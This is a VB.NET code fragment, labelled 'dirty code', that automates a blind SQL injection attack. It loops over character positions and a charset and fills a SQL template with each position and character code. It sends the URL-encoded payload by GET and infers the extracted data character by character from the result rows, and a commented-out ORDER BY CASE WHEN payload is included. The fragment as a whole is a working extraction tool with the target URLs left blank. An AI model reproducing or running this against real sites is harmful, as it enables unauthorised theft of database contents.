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- ' kitanai code
- ' dirty code
- Dim moji As String = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!""#$%&'()=~|`{+*}<>?_\/.,]:;[@\^-"
- 'moji = "0123456789."
- Dim pos As Integer = 1
- Dim checked As Boolean = False
- Dim mp As Integer = 0
- Dim maxval As Integer = 5000
- Dim chval As Integer = maxval
- Dim browser As New WebBrowser
- While 1
- If pos >= 11 Then Exit While
- Dim url As String = "" & chval
- browser.SendByGet(url)
- ' url = "" & pos & "%2C1%29%29%0D%0AWHEN%0D%0A" & Asc(moji.Substring(mp, 1)) & "%0D%0ATHEN%0D%0Atm%0D%0AELSE%0D%0Ascore%0D%0AEND%29"
- Dim sql As String = TextBox3.Text
- sql = Replace(sql, "{POS}", pos)
- sql = Replace(sql, "{CHARVAL}", Asc(moji.Substring(mp, 1)))
- url = "" & System.Web.HttpUtility.UrlEncode(sql)
- browser.SendByGet(url)
- Dim r As New Regex("\*\*\*\*</td><td>(.*?)</td></tr>", RegexOptions.Singleline Or RegexOptions.IgnoreCase)
- Dim mc As MatchCollection = r.Matches(browser.GetLastData())
- Application.DoEvents()
- Console.WriteLine("Checking [" & moji.Substring(mp, 1) & "]")
- If mc.Count <> 30 Then
- Application.DoEvents()
- Threading.Thread.Sleep(3000)
- chval = chval - 1
- If chval <= 0 Then chval = maxval
- Continue While
- End If
- Dim fmv As String = ""
- For Each m As Match In mc
- fmv = fmv & m.Groups(1).Value & " / "
- If m.Groups(1).Value = chval Then
- If checked = True Then
- Console.WriteLine("[" & (pos + 1).ToString & "] " & moji.Substring(mp, 1))
- TextBox1.Text = TextBox1.Text & moji.Substring(mp, 1)
- Application.DoEvents()
- mp = 0
- pos = pos + 1
- checked = False
- chval = chval - 1
- If chval <= 0 Then chval = maxval
- Continue While
- Else
- Console.WriteLine("maybe.... [" & moji.Substring(mp, 1) & "]?")
- checked = True
- chval = chval - 1
- If chval <= 0 Then chval = maxval
- Continue While
- End If
- End If
- Application.DoEvents()
- Next
- chval = chval - 1
- If chval <= 0 Then chval = maxval
- 'Console.WriteLine(fmv)
- Application.DoEvents()
- checked = False
- mp = mp + 1
- End While
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